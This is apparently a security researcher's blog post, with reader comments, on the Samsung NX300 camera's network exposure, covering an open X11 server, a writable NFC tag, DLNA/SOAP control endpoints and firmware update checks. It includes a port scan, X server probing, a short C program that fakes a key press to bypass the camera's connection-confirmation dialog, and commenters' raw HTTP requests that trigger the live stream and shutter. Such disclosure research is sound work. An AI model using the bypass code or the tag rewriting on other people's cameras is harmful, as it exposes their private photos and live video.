The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can connect it with your local WiFi network to upload directly to cloud services, share pictures via DLNA or obtain remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes where it creates an unencrypted access point with wide-open access to its X server and any data which you would expect only to be available to your smartphone.

Because hardware engineers suck at software security, nothing else was to be expected. Nevertheless, the following will show how badly they suck, if only for documentation purposes.

This post is only covering the network connectivity of the NX300. Read the follow-up post for getting a root shell. The smartphone app deserves some attention as well. Feel free to do your own research and link to it from the comments!

The findings in this blog posts are based on firmware version 1.31.

NFC Tag

The NFC "connectivity" is an NTAG203 created by NXP, which is pre-programmed with an NDEF message to download and launch the (horribly designed) Samsung SMART CAMERA App from Google Play, and to inform the app about the access point name provided by this individual camera:

Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX

Type: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager

The tag is writable, so a malicious user can easily "hack" your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, merely by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with an URL.

The deployed tag supports permanent write-locking, so if you know a prankster nerd, you might end up with a camera stuck redirecting you to a hardcore porn site.

WiFi Networking

You can configure the NX300 to enter your WiFi network, it will behave like a regular client with some open services, like DLNA. Let us see what exactly is offered by performing a port scan:

megavolt:~# nmap -sS -O nx300

Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (192.168.0.147)
Host is up (0.0089s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
6000/tcp open  X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

This scan was performed while the "E-Mail" application was open. In AllShare Play and MobileLink modes, 7676/tcp is opened in addition. Further, in Remote Viewfinder mode, the camera also opens 7679/tcp.

X Server

Wait, what? X11 as an open service? Could that be true? For sure it is access-locked via TCP to prevent abuse?

georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
fixed

georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
   480x800        60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)

georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)

Enlightenment Frame
di-camera-app-nx300
Enlightenment Frame
smart-wifi-app-nx300

Nope! This is really an unprotected X server! It is running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera the fun seems very limited:

NX300 xteddy

X11 Key Bindings

A short investigation using xev outlines that the physical keys on the camera body are bound to X11 key events as follows:

On/Off XF86PowerOff (only when turning off)
Scroll Wheel XF86ScrollUp / XF86ScrollDown
Direct Link XF86Mail
Mode Wheel F1 .. F10
Video Rec XF86WebCam
+/- XF86Reload
Menu Menu
Fn XF86HomePage
Keypad KP_Left .. KP_Down, KP_Enter
Play XF86Tools
Delete KP_Delete

WiFi Client: Firmware Update Check

When the camera goes online, it performs a firmware version check. First, it retrieves http://gld.samsungosp.com:

Request:

GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
Accept-Language: ko
User-Agent: Mozilla/4.0
Host: gld.samsungosp.com

Response:

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive

200 OK

This really looks like a no-op. But maybe this is a backdoor to allow for remote code execution? Who knows...

Then, a query to http://ipv4.connman.net/online/status.html returns an empty document, but has your location data (apparently obtained from the IP) in the headers:

X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin

Wow! They know where I live! At least they do not transmit any unique identifiers with the query.

As the last step, the camera is asking for firmware versions and gets redirected to an XML document with the ChangeLog.

Known versions so far:

WiFi Access Point: UPnP/DLNA

Two of the on-camera apps (MobileLink, Remote Viewfinder) open an unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX is the device part of its MAC address). Fortunately, Samsung's engineers were smart and added a user confirmation dialog to the camera UI, to prevent remote abuse:

NX300 Access Confirmation

Unfortunately, this dialog is running on a wide-open X server, so all we need is to fake an KP_Return event (based on an example by bharathisubramanian), and we can connect with whichever client, stream a live video or download all the private pictures from the SD card, depending on the enabled mode:

#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/extensions/XTest.h>
#include <unistd.h>
/* Send Fake Key Event */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym){
 KeyCode keycode = 0, modcode = 0;
 keycode = XKeysymToKeycode (disp, keysym);
 if (keycode == 0) return;
 XTestGrabControl (disp, True);
 /* Generate modkey press */
 if (modsym != 0) {
  modcode = XKeysymToKeycode(disp, modsym);
  XTestFakeKeyEvent (disp, modcode, True, 0);
 }
 /* Generate regular key press and release */
 XTestFakeKeyEvent (disp, keycode, True, 0);
 XTestFakeKeyEvent (disp, keycode, False, 0); 

 /* Generate modkey release */
 if (modsym != 0)
  XTestFakeKeyEvent (disp, modcode, False, 0);

 XSync (disp, False);
 XTestGrabControl (disp, False);
}

/* Main Function */
int main (){
 Display *disp = XOpenDisplay (NULL);
 sleep (1);
 /* Send Return */
 SendKey (disp, XK_Return, 0);
}

DLNA Service: Remote Viewfinder

The DLNA service is exposing some camera features, which are queried and used by the Android app. The device's friendly name is [Camera]NX300, as can be queried via HTTP from http://nx300:7676/smp_2_:

<dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>
  <deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
  <friendlyName>[Camera]NX300</friendlyName>
  <manufacturer>Samsung Electronics</manufacturer>
  <manufacturerURL>http://www.samsung.com</manufacturerURL>
  <modelDescription>Samsung Camera DMS</modelDescription>
  <modelName>SP1</modelName>
  <modelNumber>1.0</modelNumber>
  <modelURL>http://www.samsung.com</modelURL>
  <serialNumber>20081113 Folderview</serialNumber>
  <sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>
  <UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>
  <serviceList>
    <service>
      <serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
      <serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>
      <controlURL>/smp_4_</controlURL>
      <eventSubURL>/smp_5_</eventSubURL>
      <SCPDURL>/smp_3_</SCPDURL>
    </service>
    <service>
      <serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
      <serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
      <controlURL>/smp_7_</controlURL>
      <eventSubURL>/smp_8_</eventSubURL>
      <SCPDURL>/smp_6_</SCPDURL>
    </service>
  </serviceList>
  <sec:deviceID>
  </sec:deviceID>
</device>

Additional SOAP services are provided for changing settings like focus and flash (/smp_3_):

FunctionArgumentsResult
GetSystemUpdateIDId
GetSearchCapabilitiesSearchCaps
GetSortCapabilitiesSortCaps
BrowseObjectID BrowseFlag Filter
StartingIndex RequestedCount SortCriteria
Result NumberReturned
TotalMatches UpdateID
GetIPGETIPRESULT
GetInfomationGETINFORMATIONRESULT StreamUrl
SetResolutionRESOLUTION
ZoomINCURRENTZOOM
ZoomOUTCURRENTZOOM
MULTIAFAFSTATUS
AFAFSTATUS
setTouchAFOptionTOUCH_AF_OPTIONSET_OPTION_RESULT
touchAFAFPOSITIONTOUCHAF_RESULT
AFRELEASEAFRELEASERESULT
ReleaseSelfTimerRELEASETIMER
ShotAFSHOTRESULT
ShotWithGPSGPSINFOAFSHOTRESULT
SetLEDLEDTIME
SetFlashFLASHMODE
SetStreamQualityQuality

Another service is available for picture / video streaming (/smp_4_):

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
    <GETINFORMATIONRESULT>
      <Resolutions>
        <Resolution><Width>5472</Width><Height>3648</Height></Resolution>
        <Resolution><Width>1920</Width><Height>1080</Height></Resolution>
      </Resolutions>
      <Flash>
        <Supports><Support>off</Support><Support>auto</Support></Supports>
        <Defaultflash>auto</Defaultflash>
      </Flash>
      <FlashDisplay>
        <Supports><Support>off</Support><Support>auto</Support></Supports>
        <CurrentFlashDisplay>off</CurrentFlashDisplay>
      </FlashDisplay>
      <ZoomInfo>
        <DefaultZoom>0</DefaultZoom>
        <MaxZoom>1</MaxZoom>
      </ZoomInfo>
      <AVAILSHOTS>289</AVAILSHOTS>
      <ROTATION>1</ROTATION>
      <StreamQuality>
        <Quality><Option>high</Option><Option>low</Option></Quality>
        <Default>high</Default>
      </StreamQuality>
    </GETINFORMATIONRESULT>
    <StreamUrl>
      <QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
      <QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl>
    </StreamUrl>
    </u:GetInfomationResponse>
  </s:Body>
</s:Envelope>

After triggering the right commands, a live video stream should be available from http://nx300:7679/livestream.avi. However, a brief attempt to get some video with wget or mplayer failed.

Firmware "Source Code"

The "source code" package provided on Samsung's OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), and then some scripts. The actual build root is hidden under the second paper sheet link in the "Announcements" column.

Also, there are Obamapics in TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO.

The project is built on an ancient version of Tizen, on which I am no expert. Somebody else needs to take this stuff apart, make a proper build environment, or port OpenWRT to it.

Comments on HN

By jezra 2014-05-08 18:27:53
The camera wasn't released that long ago, and Tizen has only been around for about 3 years (if that).
By Michael 2014-05-09 11:17:29
Sounds like fun :). I can confirm that the cheaper NX2000 model also has an open X server; I'll test the other hacks later...
By Anonymous 2014-05-09 23:27:57
Nice work! Did you get any response from the vendor?
By Me 2014-05-14 17:00:56

Open X Servers are Awesome!!!

Keep in mind, to take advantage of that open X server an attacker would have to already be ON YOR LAN. Really, when was the last time you saw a home wifi connection that wasn't behind a NAT? Well, maybe some workplaces might have direct access. Why are you connecting your camera to your work's LAN? Or I guess you could set up port forwarding of the X ports to your camra, which you would do why...? Also, the probability of any open service being found and abused is proportional to how much time it spends on and connected to the internet. Do you leave your camera just sitting there turned on all day? How's that battery life for ya?

On the other hand I think anything with an open X server is a fun toy! I'm not sure there is a whole lot of reason why I would want to display an application from my desktop on my camera. But it would make me happy just knowing that I can! And I would probably be eager to annoy a few friends showing it off. Maybe I could run X apps on my Android phone and display them on such a camera? On the more useful side you could remote control or automate your own camera by sending keystrokes. That's kind of cool.

So, while I am glad that people are taking security seriously lets not overdo it. Why call a manufacturer out on making a fun toy like this? I for one want to see a future of more fun, hackable (within reason) toys, not a bunch of epoxy blobs with closed binaries limited to the original feature set designed by some unimaginative manufacturers!

By Me 2014-05-14 17:02:32
Ok, re-read your page. Sorry, I guess you didn't make that big a deal against the open X server. That was more Hack a Day commenters that did that.
By NX300 Owner 2014-05-16 16:05:45
I've recently bought one of these cameras and I'm pretty impressed with it as a camera...but I agree, the Samsung smartphone app is piss poor! I'll be following your blog with interest to see where this goes, I've been thinking you could make a much more useful app yourself with the potential for time lapse photography without the need to purchase an external widget.
By Tecnoworld 2014-05-31 17:45:46

Thanks for your efforts. It would be great if you could somehow implement the 'remote evf pro' of the nx30 into nx300.

I'm sure it could be done, since they share the same hw. So it's just a sw thing, and also the source of nx30 has been released. So you could be able to 'take' that part of the code from the source of nx30 and implement it into the nx300.....

That would enhance the capabilities of nx300, cropped by samsung.

By zoltan 2014-07-14 22:45:36

Does someone made a hacked firmware for NX 300 which is extending the 29min 59 sec recording time ? Please share it. The camera has great video capabilities, but due to import laws, the photo cameras are limited always to 30 min, so it is not enough to record a 90 minutes presentation. I bumped recently to this explanation for nx 2000, they are saying that the procedure is same for nx 300
http://www.dpreview.com/forums/thread/3646127

however i can't make it myself, I'm not an IT guy. Maybe someone did it already and has the complete rewrited firmware file, what I just install to my favourite camera :). Thank you in advance

Zoltan Hungary, Budapest

By cocojack 2014-08-20 10:52:12

Do you think its possible to open the Bootloader? I'd love to see an Android-Version on that.

app
By clod 2014-08-24 18:37:32
do you think is possible to install some app, like google snapseed, will be pefect camera!!!!
By Serg 2014-10-22 01:56:14

First request: GET /smp_2_ HTTP/1.0 User-Agent: SEC_RVF_{MAC ADRES}_ Access-Method: manual HOST: 192.168.107.1 Connection: close

Second request: GET /smp_3_ HTTP/1.0 HOST: 192.168.107.1 Connection: close

Third request: POST /smp_4_ HTTP/1.0 Content-Type: text/xml; charset="utf-8" HOST: 192.168.107.1 Content-Length: 303 SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#GetInfomation" Connection: close

After I view in VCL-player http://192.168.107.1:7679/livestream.avi

By Serg 2014-10-22 01:58:55

POST /smp_4_ HTTP/1.0 Content-Type: text/xml; charset="utf-8" HOST: 192.168.107.1 Content-Length: 291 SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#MULTIAF" Connection: close

POST /smp_4_ HTTP/1.0 Content-Type: text/xml; charset="utf-8" HOST: 192.168.107.1 Content-Length: 285 SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#Shot" Connection: close